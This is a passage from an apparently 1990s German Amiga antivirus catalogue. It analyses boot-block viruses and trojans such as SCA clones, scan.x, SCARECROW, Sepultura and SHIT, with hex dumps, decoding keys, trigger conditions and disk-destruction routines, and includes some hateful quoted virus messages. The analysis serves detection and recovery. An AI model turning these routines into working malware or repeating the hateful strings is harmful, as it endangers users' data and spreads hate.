  4554.            61737465 72202020 dc6e0000 4ef90000 aster   .n..N...
  4555.            0000412e 4d41583f 4d41583f 4d41583f ..A.MAX?MAX?MAX?
  4556.          Ein weiterer geistiger Tiefflug von MAX, mehr kann er halt
  4557.          nicht.
  4558.  
  4559.    - SCA-NASA  Virus  BB
  4560.          Nur Text geaendert
  4561.            17646f6e 6520696e 20313939 33206279 .done in 1993 by
  4562.            2041746f 6d697820 bea04113 20206f66  Atomix ..A.  of
  4563.            204e4153 41202121 21212020 2e2e2e50  NASA !!!!  ...P
  4564.  
  4565.    - SCA-PAL Virus BB  Clone  s.o.
  4566.            3216522e 492e502e 20706f6f 72205043 2.R.I.P. poor PC
  4567.            20202121 21202020 dc6e0000 4ef90000   !!!   .n..N...
  4568.            00004121 50414c21 50414c21 50414c21 ..A!PAL!PAL!PAL!
  4569.  
  4570.    - SCA-PDS Virus BB  Clone  s.o.
  4571.            65204779 73692066 6f722070 72657369 e Gysi for presi
  4572.            64656e74 206f6620 42524420 20d2aa2d dent of BRD  ..-
  4573.            17504453 20697320 74686520 6f6e6c79 .PDS is the only
  4574.  
  4575.    - SCA-PKK Virus BB  Clone  s.o.
  4576.            20206e32 5a0e4e41 5a492d56 49525553   n2Z.NAZI-VIRUS
  4577.            20212121 8c783216 4d75736c 696d7320  !!!.x2.Muslims
  4578.            74616b65 20796f75 72206c69 66658232 take your life.2
  4579.            3216696e 20796f75 72206f77 6e206861 2.in your own ha
  4580.            6e647320 20212121 dc6e0000 4ef90000 nds  !!!.n..N...
  4581.            00004121 504b4b21 504b4b21 504b4b21 ..A!PKK!PKK!PKK!
  4582.  
  4583.    - SCA-Sphinx-BB    Clone s.o.
  4584.          Nur Text geaendert:
  4585.            50041f6b 696c6c20 616c6c20 6b6e6f77 P..kill all know
  4586.            6e207669 72757320 20757365 20697420 n virus  use it
  4587.            666f7232 5a0e7072 6f746563 74696f6e for2Z.protection
  4588.            20212121 8c783216 4e75204e 75202e2e  !!!.x2.Nu Nu ..
  4589.            2e2e2e2e 202e2e2e 2e2e2e2e 2e2e8232 .... ..........2
  4590.            32165370 68696e78 2066726f 6d205452 2.Sphinx from TR
  4591.  
  4592.    - SCA-TAI-Virus BB  Clone  s.o.
  4593.          Nur Text geaendert
  4594.            75732020 8c783216 54686520 416e7469 us  .x2.The Anti
  4595.            6c616d65 7220496e 636f7270 6f726174 lamer Incorporat
  4596.            696f6e20 66726f6d 204b6172 6c204d61 ion from Karl Ma
  4597.            72782056 492e2020 dc6e0000 4ef90000 rx VI.  .n..N...
  4598.            00004121 54414921 54414921 54414921 ..A!TAI!TAI!TAI!
  4599.  
  4600.    - SCA defekt oder weitere Clones
  4601.          Es wird immer wieder versucht, das Original abzuaendern.
  4602.          z.B. Block 0 ist Original-SCA, Block 1 (also ab $200) ist
  4603.          irgendein Datenschrott. Ein solcher BB liegt vor und wird
  4604.          von VT als SCA-Clone erkannt.
  4605.          Begruendung: Die Vermehrungsroutine liegt in Block 0 und
  4606.          wird auch ausgefuehrt. Zum Absturz kommt es erst, wenn der
  4607.          Text ausgegeben werden soll.
  4608.  
  4609.    - ScanEbola97-Trojan   siehe bei LiSA-3.0-Trojan
  4610.  
  4611.    - ScanLink-Trojan  siehe bei WiREFACE-Trojan
  4612.  
  4613.    - scansystem   siehe bei SystemScan-Trojan
  4614.  
  4615.    - scan.x-BBS-Bomb
  4616.          Keine verbogenen Vektoren.
  4617.          Reset nach der Zerstoerungsroutine.
  4618.          Es ist ein bnuke15.lha Archiv aufgetaucht. Laenge: 35050 Bytes
  4619.          Dieses Archiv enthaelt mehrere Files, die fuer BBS nuetzlich
  4620.          sein sollen: bossnuke.x 35308, ULOG.X 18560  usw.
  4621.          Ein derartiges Programmpaket mit V1.0 gibt es wirklich und
  4622.          das ist sauber.
  4623.          An ULOG.X ist nun ein Hunk angehaengt am Ende. Dieser letzte
  4624.          Teil ist codiert mit    EORI.B    #$12,D1 .
  4625.          Dieser codierte Teil erstellt 2 Files:
  4626.          a:   BBS:COMMANDS/BBSCMD/L.info   Laenge: 1060
  4627.                In diesem Icon ist zu lesen:
  4628.            00000b41 43434553 533d3030 31000000 ...ACCESS=001...
  4629.            00164c4f 43415449 4f4e3d64 6f6f7273 ..LOCATION=doors
  4630.            3a736361 6e2e7800 0000000d 4d554c54 :scan.x.....MULT
  4631.            494e4f44 453d4e4f 00000000 0b505249 INODE=NO.....PRI
  4632.            4f524954 593d3000 0000000b 53544143 ORITY=0.....STAC
  4633.            4b3d3430 39360000 00000954 5950453d K=4096.....TYPE=
  4634.            58494d00 00000000 00000000 00000000 XIM.............
  4635.          Es kommt also scan.x vor. Das Icon-Bild zeigt eine Steckkarte.
  4636.  
  4637.          b:   doors:scan.x    Laenge: 712
  4638.           Dieses File enthaelt ausser DOS3 und dos.library nichts
  4639.           lesbares.
  4640.           Dieses Teil enthaelt die Zerstoerungsroutine.
  4641.           Ablauf:
  4642.           Ueber Zeiger in der dos.lib werden LWe gesucht. Die
  4643.           Routine wurde sehr aehnlich schon vom Modem-Virus (FUCK)
  4644.           benutzt.
  4645.          Durch die Zerstoerungsroutine werden die Bloecke mit DOS3
  4646.          aufgefuellt. s.u.
  4647.          Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur
  4648.          Format. Versuche mit einer Syquest und DiskSalv2 waren nicht
  4649.          sehr erfolgreich.
  4650.                    pZyl 1 Bl     22
  4651.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4652.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4653.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4654.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4655.          Neu und schlimm: Das Programm erreicht durch  subq.w #2,d1
  4656.          auch den Rigid-Bereich (s.o. pZyl) . Das konnte der Modem-
  4657.          Check-Virus noch nicht. Das scan.x-File arbeitet auch ohne
  4658.          BBS .
  4659.          VT bietet loeschen an fuer:
  4660.          ULOG.X ,scan.x und L.info .
  4661.          Hinweis: falls es bei L.info Fehlerkennungen bei FileTest
  4662.          gibt, informieren Sie mich bitte.
  4663.          Von einer Erkennung der zerstoerten DOS3-Bloecke wurde abge-
  4664.          sehen, da eine format-routine existieren koennte, die genau
  4665.          so formatiert.
  4666.          Hinweis: Falls Sie glauben, dass irgendein Virusteil mit
  4667.          dem formatieren beginnt, schalten Sie SOFORT ihren Computer
  4668.          aus. Sie verlieren dann mit etwas Glueck nur EINE Partition.
  4669.          Das ist zwar schaedlich fuer die Hardware, aber halt der
  4670.          letzte Notnagel !!!!
  4671.          
  4672.    - SCARECROW-Trojan      Zerstoerung
  4673.          bekannter Filename: IO4-INVI.EXE
  4674.          Namensbegruendung: siehe unten
  4675.          Filelaenge gepackt:  #63484 Bytes
  4676.          Filelaenge entpackt: #100348 Bytes
  4677.          Nicht Resetfest
  4678.          Keine Verbogenen Vektoren
  4679.          Ein AMOS-Programm
  4680.          Nach Doc: ein Intel Outside 4 Demo
  4681.          Ablauf:
  4682.          Es wird ein Bild ausgegeben, das auch Text enthaelt:
  4683.          SCARECROW JUST ERASED ALL LAMENESS
  4684.          Danach ist ein Reset notwendig
  4685.          Schaden:
  4686.           - user-startup wird neu geschrieben  Laenge: #4560 Bytes
  4687.             enthaelt dann: Text DevilCheck 2.0 Bugreport
  4688.           - startup-sequence wird neu geschrieben  Laenge: #4924 Bytes
  4689.             enthaelt dann: Text VirusScanList V1.35 Sept. 96
  4690.          VT bietet nur loeschen an.
  4691.          Die ueberschriebenen Files sind nicht zu retten. Legen Sie
  4692.          besser im S-Dir Kopien an.
  4693.          
  4694.    - SCARECROW-2-Trojan      Zerstoerung
  4695.       bekannter Filename: ibrowse2
  4696.       Namensbegruendung: siehe unten 
  4697.       Filelaenge: #327848 Bytes
  4698.       Nicht Resetfest
  4699.       Keine Verbogenen Vektoren
  4700.       Ein AMOS-Programm
  4701.       Nach FileID: IBrowse 2.00 FINAL 68030+
  4702.       Im File ist zu lesen:
  4703.                    000b5261 6d3a5072 6f746563     ..Ram:Protec
  4704.           7400000b 52616d3a 4b696c6c 52444200 t...Ram:KillRDB.
  4705.           002d5241 4d3a5072 6f746563 74205359 .-RAM:Protect SY
  4706.           533a532f 73746172 7475702d 73657175 S:S/startup-sequ
  4707.           656e6365 20464c41 47532052 57454400 ence FLAGS RWED.
  4708.           00295241 4d3a5072 6f746563 74205359 .)RAM:Protect SY
  4709.           533a532f 75736572 2d737461 72747570 S:S/user-startup
  4710.           20464c41 47532052 57454400 00165359  FLAGS RWED...SY
  4711.           533a532f 73746172 7475702d 73657175 S:S/startup-sequ
  4712.           656e6365 00125359 533a532f 75736572 ence..SYS:S/user
  4713.           2d737461 72747570 00215241 4d3a4b49 -startup.!RAM:KI
  4714.           4c4c5244 42207363 73692e64 65766963 LLRDB scsi.devic
  4715.           6520414c 4c20464f 52434500 00105255 e ALL FORCE...RU
  4716.           4e203c4e 494c3a20 3e4e494c 3a200004 N <NIL: >NIL: ..
  4717.           4e494c3a 00000000                   NIL:....
  4718.       Ablauf:
  4719.       Es wird ein Bild ausgegeben, das auch Text enthaelt:
  4720.       SCARECROW JUST ERASED ALL LAMENESS
  4721.       Einige Teile aus dem File werden nach Ram: geschrieben
  4722.       Schaden:
  4723.        - user-startup und startup-sequence wird neu geschrieben
  4724.          Laenge: #1304 Bytes
  4725.          enthaelt dann:
  4726.        ScareCrow
  4727.        Since i now have your undevided attention while you are trying to save
  4728.        what is left of your hard-disk i might as well begin.  usw....
  4729.        - killrdb wird gestartet und nach scsi.device gesucht. Falls ge-
  4730.          funden, wird der Rigid-Bereich zerstoert.
  4731.       VT bietet nur loeschen an.
  4732.       Die ueberschriebenen Files sind nicht zu retten. Legen Sie
  4733.       besser im S-Dir Kopien an.
  4734.  
  4735.  
  4736.    - SCARFACE   BeginIo, KickTag, KickCheckSum, Vec5
  4737.          FastMem nein
  4738.          Vermehrung: ueber BB
  4739.          ResetRoutine, die ueber Vec5 gesteuert wird (Zaehlzelle > $2710)
  4740.          Im BB sichtbar:  z.B. SCARFACE
  4741.          Hinweis: In einer Viren-Sammlung wird ein Scarface II gefuehrt.
  4742.          Mit VT-vergleiche:
  4743.            Scarface:                       Scarface II
  4744.       000: 444f5300 48bddd38 DOS.H..8 000: 444f5300 b1140dbd DOS.....
  4745.                a)   ^^^^^^^^                        ^^^^^^^^
  4746.       008: 00000370 60000006 ...p`... 008: 00000370 60000006 ...p`...
  4747.       010: 00000232 48e77f7f ...2H... 010: 00000401 48e77f7f ....H.
  4748.            b)  ^^^^                            ^^^^
  4749.       328: 732e6c69 62726172 s.librar 328: 732e6c69 62726172 s.librar
  4750.       330: 79000000 00000000 y....... 330: 79002400 0a825555 y.$...UU
  4751.            c)  ^^^^^^^^^^^^^                   ^^^^^^^^^^^^^
  4752.            a) Pruefsumme muss sich immer aendern
  4753.            b) Zaehler
  4754.            c) Bereich, der vom Virusteil als Ablage verwendet wird, und
  4755.               IMMER anders aussieht.
  4756.            Der Viruscode ist sonst bis zum c-Bereich VOELLIG gleich.
  4757.            Sie sehen also, eine Unterscheidung ist nicht zu begruenden.
  4758.  
  4759.  
  4760.    - scsi-Virus     File   Laenge ungepackt: 1560 Bytes
  4761.          reines Zerstoerungsprogramm
  4762.          KEINE verbogenen Vektoren
  4763.          KS3.0: ja
  4764.          Keine Vermehrungsroutine
  4765.          Fileauszug:
  4766.            2c780004 4eaefe3e 4e75733a 24e724a1 ,x..N..>Nus:$.$.
  4767.                                  ^^^^^^^^^^^^^
  4768.            00000000 00000000 00000000 00000000 ................
  4769.            00000000 00000000 00000000 00000000 ................
  4770.            00000000 00000000 00000000 00000000 ................
  4771.            00000000 00000000 00000000 00000000 ................
  4772.            00000000 00000000 00000000 00000000 ................
  4773.            00000000 646f732e 6c696272 61727900 ....dos.library.
  4774.            8b624828 91819187 1e000000 00000000 .bH(............
  4775.            ;;;;;;;; :::::::::::
  4776.  
  4777.            ;;;;  decodiert mit subi.b #$28,d0 ergibt:  "c: ",0
  4778.            ::::  decodiert mit subi.b #$1E,d0 ergibt:  "scsi",0
  4779.  
  4780.          Ablauf:
  4781.            Test ob der Filename (^^^^) "s:$",E7,"$",A1,0 vorhanden
  4782.            ist. Falls ja, Virusprogrammende
  4783.            DateStamp wird aufgerufen und auf $15A0 = 27.Feb.93
  4784.            ueberprueft.
  4785.            -Falls die Computerzeit noch nicht so weit ist, wird
  4786.             mit LoadSeg das Original-Programm aufgerufen ("c: ",0)
  4787.             und durch einen direkten Einsprung abgearbeitet. Danach
  4788.             wird UnloadSeg aufgerufen und das Virusprogramm beendet.
  4789.            -Falls die Systemzeit den 27.Feb.93 erreicht hat:
  4790.             Ueber dosbase+$22 wird die device-Liste durchsucht.
  4791.             Verglichen werden NUR devices (keine Vol usw.) mit
  4792.             scsi  (s.o.). Also ein Test auf vier Buchstaben.
  4793.               d.h. alles was mit scsi beginnt, wird ausgewaehlt.
  4794.                   auch scsi3... usw.
  4795.               NICHT ausgewaehlt wird SCSI oder gvpscsi usw.
  4796.             Danach wird der ROOT-Block berechnet und durch Auffuellen
  4797.             mit Nullen zerstoert.
  4798.             WICHTIG:
  4799.             Da dieser Vorgang in einer Schleife ablaeuft, werden ALLE
  4800.             Root-Bloecke von ALLEN Laufwerken und ALLEN Partitionen, die
  4801.             die Vorgabe erfuellen, zerstoert. Hab ich mit einer Wechsel-
  4802.             platte und drei Partitionen ausprobiert.
  4803.  
  4804.             VT erkennt das Virus-File und bietet Rename mit dem Original-
  4805.             File in c: an. Falls das Original-File in c: nicht gefunden
  4806.             wird, schlaegt VT vor, das Virus-File allein zu loeschen.
  4807.  
  4808.             Hinweis:
  4809.             Mit DiskSalv Repair konnten alle Partition wieder herge-
  4810.             stellt werden, da der Root-Block jeweils neu aufgebaut wurde.
  4811.             Bitte besorgen Sie sich deshalb DiskSalv (neuste Version 93)
  4812.             BEVOR der Unfall passiert. DiskSalv belegt die Partition
  4813.             mit dem Namen wanagi-wachipi . Also so aehnlich wie diskdoctor
  4814.             mit Lazarus frueher.
  4815.  
  4816.             Wichtig 2:
  4817.             Es MUSS ein INSTALL-Programm geben. Dieses ist bis jetzt
  4818.             nicht bekannt. Bitte helfen Sie mit bei der Suche. Danke !
  4819.               Denn niemand benennt freiwillig ein Original-Programm
  4820.               in ein unsichtbares File in c: um.
  4821.  
  4822.    - SDS-schaedl.Prg   Susi_Drive_Stepper
  4823.          KEIN Virus
  4824.          Laenge: 904 Bytes
  4825.          KEINE Vermehrung
  4826.          KEINE verbogenen Vektoren
  4827.          Im File ist zu lesen:
  4828.            65736f75 72636500 73757369 00616e64 esource.susi.and
  4829.            72656100 76616c65 6e74696e 6100696e rea.valentina.in
  4830.            67726964 00636872 69730000 0a000120 grid.chris.....
  4831.          Vorsicht: das File bewegt den LWs-Kopf sehr schnell. Wie lange
  4832.          das ihr LW aushaelt sollten Sie NICHT ausprobieren.
  4833.          Das File wurde aufgenommen um die Erbsenzaehler zu beruhigen.
  4834.          Ich sehe KEINEN Grund, warum jemand freiwillig dieses Prg.
  4835.          starten sollte.
  4836.  
  4837.    - Self-Writer  andere Namen: Pseudoselfwriter   siehe bei Lamer
  4838.          da im entschluesselten Programm The LAMER Ex... zu lesen ist und
  4839.          das Verhalten einem Lamervirus entspricht, halte ich eine
  4840.          Zuordnung zur Lamer-Gruppe fuer richtig.
  4841.  
  4842.    - Sendarian   Revenge V1.2-Clone, Cool, DoIo, Vec5, im Speicher $7e000
  4843.          und Speicherstelle $C0-$FF (Gefahr fuer setpatch-Liste)
  4844.          Vermehrung: ueber BB
  4845.          Schaden: nach einiger Zeit neuer Mauszeiger
  4846.          im BB sichtbar: Sendarian #1Count:
  4847.  
  4848.    - Sentinel-Virus   BB   Excrement-Clone (Texte geaendert)
  4849.          Nachtrag 08.07.93:
  4850.          Es wird auch der Name USSR 492 verwendet, da aber auf "Sent"
  4851.          im Virus selbst getestet wird, halte ich den Namen Sentinel
  4852.          fuer sinnvoller.
  4853.          Cool: $7F47A   DoIo: $7F4C2  immer ab: $7F400
  4854.          KS2.06: GURU B nach Reset
  4855.          Fordert trackdisk.device NICHT
  4856.          Namensbegruendung: im BB ist zu lesen:
  4857.               61727900 53656e74 696e656c 21002d7c ary.Sentinel!.-.
  4858.          Vermehrung: BB
  4859.          linke Maustaste= Abbruch und Cool-Vektor loeschen
  4860.          Test auf DOS-Kennung
  4861.          Test ob schon verseucht mit cmpi.l #"Sent",$6c(a4)
  4862.          Was natuerlich FALSCH ist. An dieser Stelle steht Sent NIE !!!
  4863.          Richtig waere $54(a4). Anfaenger merke, nicht jeder der Texte
  4864.          aendern kann, versteht auch die Codierung. (vgl. bei EXCREMENT)
  4865.          Schaeden: Sobald eine Zaehlzelle den Wert $A erreicht hat,
  4866.             blinkt die LED. Mehr ist bei mir nicht passiert.
  4867.          anderer Name: USSR 492
  4868.  
  4869.    - Sepultura-BB-Virus    Bootblock
  4870.          Verbogene Vektoren: Cool, DoIo, Forbid, DisplayAlert
  4871.          Fordert trackdisk.device NICHT                          
  4872.          Decodiert ist im BB zu lesen:
  4873.            732e6c69 62726172 79000054 68652053 s.library..The S
  4874.            6570756c 74757261 2d566972 75732120 epultura-Virus!
  4875.            6d616465 20627920 4d617820 6f662053 made by Max of S
  4876.            7461724c 69676874 2032342f 332f3933 tarLight 24/3/93
  4877.            003e436f 70696573 3a303031 3c0048e7 .>Copies:001<.H.
  4878.          Der BB wird immer neu in Abhaengigkeit von $DFF00A codiert.
  4879.          Schaden:
  4880.          Sobald eine Zaehlzelle den Wert $F erreicht hat, wird
  4881.          ein Text (s.o.) in Block 880 geschrieben. Bei einer Disk
  4882.          ist das der Rootblock (bei einer Festplatte kann es ein
  4883.          Fileblock sein). Die Disk ist danach unbrauchbar. 
  4884.              Block 880 vorher             Block 880 zerstoert
  4885.          00: 00000002 00000000 ........ : 54686520 53657075 The Sepu
  4886.          08: 00000000 00000048 .......H : 6c747572 612d5669 ltura-Vi
  4887.          10: 00000000 00000000 ........ : 72757321 206d6164 rus! mad
  4888.          18: 00000000 00000000 ........ : 65206279 204d6178 e by Max
  4889.          20: 00000000 00000000 ........ : 206f6620 53746172  of Star
  4890.          28: 00000037 00000000 ...7.... : 4c696768 74203234 Light 24
  4891.          30: 00000000 00000000 ........ : 2f332f39 33004b09 /3/93.K.
  4892.  
  4893.  
  4894.    - SEPULTURA-Virus  File   Laenge ungepackt: 1876 Bytes
  4895.          KS1.3 : ja
  4896.          KS2.04: Endlos-GURU . Sie muessen den Computer ausschalten.
  4897.                  Tastatur-Reset fuehrt wieder zu GURU. Laden eines Files
  4898.                  z.B. KReset ist auch nicht moeglich.
  4899.          Verbogene Vektoren: KickTag, KickCheckSumPointer
  4900.                              Open, Lock, Delete, Rename, LoadSeg
  4901.          Zeitweise verbogene Vektoren: $6c, FindResident
  4902.          Das Programm rettet fast KEINE Vektoren !!!!!
  4903.          Arbeitet mit df0:, df1: und df2: . Mehr Laufwerke hat der
  4904.          Programmierer wahrscheinlich nicht.
  4905.          Namensbegruendung: s.u. lat. sepultura = Begraebnis
  4906.  
  4907.          Ein Speicherbereich wird decodiert mit: eori.b #$FB,(a0)+
  4908.            0000646f 732e6c69 62726172 79006466 ..dos.library.df
  4909.            303a732f 73746172 7475702d 73657175 0:s/startup-sequ
  4910.            656e6365 00006466 303aa0a0 a0a00000 ence..df0:......
  4911.                                  ^^^^^^^^^
  4912.          ^^^^^ unsichtbarer Filename "A0A0A0A0" in Root von df0/1/2 .
  4913.          Die Null der beiden df0: wird bei Bedarf im Programm-Code
  4914.          durch 1 oder 2 ersetzt.
  4915.  
  4916.          Ausgabe eines Textes mit DisplayAlert in Abhaengigkeit
  4917.          von $DFF006 .
  4918.          Fuer DisplayAlert wird bei Bedarf ein Speicherbereich
  4919.          decodiert mit: eori.b #$FA,(a0)+       
  4920.            790000fa 0a486920 4775797a 20212100 y....Hi Guyz !!.
  4921.            0100a014 53455055 4c545552 41207374 ....SEPULTURA st
  4922.            72696b65 73206261 636b2077 69746820 rikes back with
  4923.            74686569 72206e65 77000100 fa232056 their new....# V
  4924.            49525553 21212100 01009632 4c6f6f6b IRUS!!!....2Look
  4925.              usw.......
  4926.          Hinweis: Ein Satz, der decodiert wird, erscheint nicht beim
  4927.           Alert. Wahrscheinlich hat sich der Programmierer verzaehlt.
  4928.  
  4929.          Vor Schreibzugriff auf Disk wird getestet auf:
  4930.              - validated
  4931.              - max $6a0=1696 Bloecke belegt
  4932.  
  4933.          Empfehlung: unsichtbares File in Root loeschen und in startup-
  4934.           sequence die entsprechende Zeile entfernen.
  4935.          VT kennt: 14.04.93
  4936.          VT setzt ALLE Vektoren zurueck .
  4937.  
  4938.    - Sepultura2.26-Virus  File   Laenge ungepackt: 1980 Bytes
  4939.          KS1.3 : ja
  4940.          KS2.04: ja
  4941.          68030 : bei mir GURU 3
  4942.          Verbogene Vektoren: Open, Lock, Delete, Rename, LoadSeg
  4943.          NICHT resetfest (also KickTag nicht mehr verbogen)
  4944.          Arbeitet mit df0:, df1: und df2: .
  4945.  
  4946.          Im Speicher wird decodiert mit: eori.b #$XY,(a0)+
  4947.          XY aendert sich bei jeder Vermehrung in Abhaengigkeit
  4948.          von $DFF006.
  4949.           6C696272 61727900 6466303A 732F7374 library.df0:s/st
  4950.           61727475 702D7365 7175656E 63650000 artup-sequence..
  4951.           6466303A A0A0A0A0 00000000          df0:    ....
  4952.                    ^^^^^^^^
  4953.          ^^^^^ unsichtbarer Filename "A0A0A0A0" in Root von df0/1/2 .
  4954.          Die Null der beiden df0: wird bei Bedarf im Programm-Code
  4955.          durch 1 oder 2 ersetzt.
  4956.          Namensbegruendung:
  4957.          Im Speicher ist zu lesen:
  4958.                                      20536570              Sep
  4959.           756C7475 72612028 56322E32 36290000 ultura (V2.26)..
  4960.          Bitte aendern Sie auch die startup-sequence !!!
  4961.  
  4962.    - SHI-Virus  BB           s.o. Aust.Par-Clone  BB
  4963.          Nur Text geaendert
  4964.  
  4965.    - SHIT-Virus  (BB)   nicht mit KS2.04, nicht mit FastMem
  4966.          KickTag, KickCheckSum, BeginIo, Vec5, $64, $68, $6c
  4967.          haeufig GURU
  4968.          Zeitzaehler: 8 Min
  4969.          setzt irgrndwann $60 auf 0
  4970.          codiert mit: eor.w d0, (a0)+
  4971.                       add.w $xyz(pc),d0
  4972.          Im codierten BB ist zu lesen: Nuked007 (wobei Nu=RTS)
  4973.          Zugeschickt wurde mir der BB als Ethik-BB. Diesen Namen kann
  4974.          ich nicht nachvollziehen.
  4975.          Zugeschickt wurde mir ein BB als HACKERS-BB. Diesen Namen kann
  4976.          ich nicht nachvollziehen (auch nicht im Speicher).
  4977.          Schaeden in Abhaengigkeit von der Zaehlzelle:
  4978.             - schreibt $1400 Bytes ab Block 0   (Absicht ???)
  4979.                  zerstoert also auch Files die ab Block 2 liegen
  4980.             - schreibt in einen Block ab $30 SHIT
  4981.                   addiert 8 zu $10 im Block (bei OFS=NextDataBlock)
  4982.                   addiert 8 zu $14 im Block (bei OFS=BlockCheckSum)
  4983.                   schreibt den veraenderten Block dann 1 Position
  4984.                   spaeter zurueck.
  4985.             Diese Files sind NICHT zu retten !!!!!!!!
  4986.          Hinweis: Da bei BlockKette und BlockITest nur auf "SHIT" an $30
  4987.            getestet werden kann (mehr gibt es nicht), KANN es zu
  4988.            Fehlerkennungen kommen !!!!
  4989.          Gefaehrlich: in weniger als 5 Minuten habe ich 12 SHIT-Bloecke
  4990.             auf einer Disk erzeugt !!!
  4991.          Decodiert ist im Speicher zu lesen:
  4992.            002450a8 001050a8 0014217c 53484954 .$P...P...!|SHIT
  4993.              ;.....
  4994.            6000fd1a 74726163 6b646973 6b2e6465 `...trackdisk.de
  4995.            76696365 00616d69 6761646f 732e6c69 vice.amigados.li
  4996.            62726172 79000000 00003a4b 00fe9c3e brary.....:K...>
  4997.          Beispiele fuer SHIT in einem Block:
  4998.          Beispiel fuer eine Fehlerkennung:
  4999.                Block:    1580
  5000.          0010: 0000062d d4d0f761 4e004255 4c4c4f43 ...-...aN.BULLOC
  5001.          0020: 4b004255 4c4c5345 59450000 42554c4c K.BULLSEYE..BULL
  5002.          0030: 53484954 00004255 4c4c5900 42554c52 SHIT..BULLY.BULR
  5003.          0040: 55534800 42554c57 41524b00 42554d42 USH.BULWARK.BUMB
  5004.          SHIT steht zwar an $30, aber es ist ein Wort "BULLSHIT".
  5005.          Es handelt sich also um eine VT-Fehlerkennung !!!!!! Falls Sie
  5006.          also einen Textzusammenhang herstellen koennen, denken Sie
  5007.          bitte an eine Fehlerkennung. Ich hoffe aber, dass die
  5008.          $30-SHIT-Zufaelle eher selten vorkommen. Es gibt KEIN weiteres
  5009.          Testmerkmal.
  5010.          Beispiele fuer eine ECHTE Zerstoerung:
  5011.                Block:     415
  5012.          0020: a8da2951 a4caa213 00ba84aa 3129546a ..)Q........1)Tj
  5013.          0030: 53484954 2f252a8c 62551bac aa3e9954 SHIT/%*.bU...>.T
  5014.          0040: 72f2a8fc c02e716a 8c6ad51a b5aa35eb r.....qj.j....5. 
  5015.                Block:     787
  5016.          0020: d301d542 60167c02 1e3b70e8 d2016604 ...B`.|..;p...f.
  5017.          0030: 53484954 d5425307 66f2d446 7c003a46 SHIT.BS.f..F|.:F
  5018.          0040: 3e03d201 66041220 d3016436 d643d201 >...f.. ..d6.C..
  5019.                Block:     848
  5020.          0020: 27191ef0 b7952d78 d4d74ffc 05519389 '.....-x..O..Q..
  5021.          0030: 53484954 43224310 173ee88a 89343b31 SHITC"C..>...4;1
  5022.          0040: 6c3e48ee 311d3a1d 1f4c8467 6fc107cc l>H.1.:..L.go...
  5023.          Diese Disk wurde wirklich von SHIT zerstoert. Sie sehen, es
  5024.          wird nur SHIT geschrieben und KEIN anderer Text ist in der
  5025.          Naehe.
  5026.  
  5027.    - Shocked-Gag   siehe bei Trick-Gag
  5028.  
  5029.    - SILESIAN-BB-Virus   s.o.  MOSH.1.0-BB-Virus
  5030.  
  5031.    - SILESIAN-Virus   Linkvirus  siehe bei INVADER-Virus
  5032.  
  5033.    - SMBX-Mount Virus  File  Laenge ungepackt: 65488 Bytes
  5034.          KEINE verbogenen Vektoren.
  5035.          Installiert Mount-Virus  (s.o.)
  5036.          Namensbegruendung: im File ist zu lesen:
  5037.            00000000 00001897 733a534d 42582d44 ........s:SMBX-D
  5038.            4f532e63 66675573 6572203a 20526573 OS.cfgUser : Res
  5039.             ......
  5040.            6963652f 2f2f2f2f 202d444f 532d5368 ice///// -DOS-Sh
  5041.            656c6c20 56202863 29313939 312f3932 ell V (c)1991/92
  5042.          Ein aufmerksamer User hat das Teil gefunden. Danke !!!!!!
  5043.          Es handelt sich um ein Shell-Programm, das mit einem Mail-
  5044.          box-Programm mitgeliefert werden soll?
  5045.          Das codierte Mount-Virus-Teil liegt von $EC38 bis $F068 im
  5046.          File. Es handelt sich beim Shell-Programm um eine Gfa-Basic-
  5047.          Compilierung und die Decodierung findet IM Gfa-Teil statt.
  5048.          Deshalb muss nach meiner Meinung der Programmierer des Mount-
  5049.          Virus-Teils den Source-Code des Basicprogramms besitzen.
  5050.          Ein Ausbau ist aus oben genannten Gruenden nicht moeglich.
  5051.          Empfehlung deshalb: loeschen und bei der Lieferfirma nach dem
  5052.          Programmierer forschen !!!
  5053.  
  5054.  
  5055.    - Smeg-Virus      File  Link
  5056.          ab KS2.04: ja   (Versionsabfrage auf mind. #37)
  5057.          Namensbegruendung:  im Linkteil ist decodiert zu lesen: 
  5058.             79002e69 6e662e6c 68612e6c 7a782e44 y..inf.lha.lzx.D
  5059.             4d53000a 536d6567 21204974 27732061 MS..Smeg! It's a
  5060.             0a486f73 74696c65 2054616b 654f7665 .Hostile TakeOve
  5061.             7221                                r!
  5062.          Verbogener Zeiger: $6c(ProcessStruktur) <> ProcessStrukturStart
  5063.          Resetfest: Nein
  5064.          Fileverlaengerung: 1900 Bytes
  5065.          Link hinter den ersten Hunk.
  5066.  
  5067.          Speicherverankerung:
  5068.            Die Lib-Liste wird durchlaufen. In Abhaengigkeit von $DFF007
  5069.            wird ein Libname z.B. expansion.library ausgelesen. Dieser
  5070.            Name wird um .library gekuerzt. Sollte er dann immer noch
  5071.            laenger als #14 sein, so wird weiter gekuerzt. Dieser Teil-
  5072.            name wird dann als VirusTaskName verwendet.
  5073.            Task wird erstellt (AddTask)
  5074.            TaskStack: #512
  5075.            Prio: 0
  5076.            Verbiegt $6c von bestimmten ProcessStrukturen (z.B. WB31) auf
  5077.            eigene TaskStruktur
  5078.            Wartet dann mit Wait auf DosBit Signal ($100)
  5079.            Hinweis1: Bei Tests ist es gelungen, das Teil mehrmals in der
  5080.            Taskliste auftauchen zu lassen (duerfte nicht sein)
  5081.            Hinweis2: VT versucht das Teil komplett aus der TaskWait-Liste
  5082.            zu entfernen. Bei meinen Tests ist das auch immer gut ge-
  5083.            gangen. Falls Sie Probleme bekommen (Maschine zeigt Guru),
  5084.            dann waere ich fuer eine Mitteilung dankbar. Allgemein sollten
  5085.            Sie ueberlegen, ob es nicht besser waere von einer schreibge-
  5086.            schuetzten AntiVirusDisk neu zu Booten.
  5087.          Vermehrungsbedingungen:
  5088.            - File ist noch nicht verseucht (eor.w d0,d1  cmp.w #$fab4,d1)
  5089.            - max. Filelaenge $20000 = #131072 Bytes
  5090.            - 3F3 wird gefunden
  5091.            - 3E9-Hunk wird gefunden
  5092.            - Medium validated
  5093.            - mind. #10 Block frei
  5094.            - Medium hat mind. #8000 Block  (also keine Disk-Verseuchung)
  5095.            - die vier Bytes 0,"VIR" (auch klein) werden nicht gefunden
